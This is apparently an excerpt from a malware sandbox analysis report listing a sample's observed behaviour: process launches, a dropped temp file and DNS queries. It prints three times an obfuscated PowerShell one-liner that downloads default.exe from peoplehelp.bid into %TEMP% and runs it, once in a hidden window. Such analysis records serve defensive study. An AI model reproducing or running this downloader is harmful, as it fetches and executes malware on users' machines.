Technical Information
- '<SYSTEM32>\cmd.exe' /c PowerShell(nEW-ObJECT ('System.'+'N'+'et.WebCli'+'en'+'t')).('Down'+'load'+'File').Invoke('http://peoplehelp.bid/default.exe','%TEMP%\default.exe');STARt-PRoCe`sS '%TEMP%\default.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1436
- %TEMP%\728805.cvr
- DNS ASK co##############e-chains.prod.autograph.services.mozaws.net
- DNS ASK pe###ehelp.bid
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (nEW-ObJECT ('System.'+'N'+'et.WebCli'+'en'+'t')).('Down'+'load'+'File').Invoke('http://peoplehelp.bid/default.exe','%TEMP%\default.exe');STARt-PRoCe`sS '%TEMP%\default.exe';
- '<SYSTEM32>\cmd.exe' /c PowerShell(nEW-ObJECT ('System.'+'N'+'et.WebCli'+'en'+'t')).('Down'+'load'+'File').Invoke('http://peoplehelp.bid/default.exe','%TEMP%\default.exe');STARt-PRoCe`sS '%TEMP%\default.exe';' (with hidden window)